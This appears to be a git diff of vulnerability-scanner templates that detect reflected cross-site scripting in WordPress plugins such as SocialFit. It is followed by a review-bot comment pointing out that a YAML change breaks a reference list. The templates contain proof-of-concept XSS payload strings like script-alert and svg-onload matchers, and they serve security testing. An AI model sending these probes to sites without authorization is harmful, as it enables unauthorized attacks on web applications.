@@ -7,7 +6,6 @@ info: reference: - https://www.exploit-db.com/exploits/37948 tags: wordpress,xss,wp-plugin - requests: - method: GET path: @@ -22,12 +20,10 @@ requests: words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/xss/wp-socialfit-xss-11582.yaml b/poc/xss/wp-socialfit-xss-11582.yaml index 56b6690c8f..61f70d16de 100644 --- a/poc/xss/wp-socialfit-xss-11582.yaml +++ b/poc/xss/wp-socialfit-xss-11582.yaml @@ -1,15 +1,13 @@ id: wp-socialfit-xss - info: name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting author: daffainfo severity: medium description: | SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - reference: + reference: | - https://www.exploit-db.com/exploits/37481 tags: wordpress,xss,wp-plugin - requests: - method: GET path: diff --git a/poc/xss/xss-fuzz-11701.yaml b/poc/xss/xss-fuzz-11701.yaml index 3bed54cfe7..d4410a5f77 100644 --- a/poc/xss/xss-fuzz-11701.yaml +++ b/poc/xss/xss-fuzz-11701.yaml @@ -1,6 +1,5 @@ # id contains the unique identifier for the template. id: esetal-xss-fuzz - info: # Name is the name of the template name: Top 15 XSS Check @@ -10,7 +9,6 @@ info: # Description optionally describes the template. description: Searches for reflected XSS in the server response via GET-requests (but 9x slower xd). tags: xss - requests: - method: GET path: @@ -30,12 +28,10 @@ requests: words: - "<svg/onload=confirm('testing-xss" part: body - - type: word words: - "text/html" part: header - - type: status status: - - 200 \ No newline at end of file + - 200
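Review bot: In `wp-socialfit-xss-11582.yaml`, `reference: |` followed by `- https://www.exploit-db.com/exploits/37481` is no longer a list. The block-scalar indicator makes the value one string that begins with `- ` and ends with a newline, so anything that reads the field as a URL gets a malformed value. Drop the `|` and keep plain `reference:` with the list item beneath it. The `requests:` block continues outside the hunk.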
troy + serial server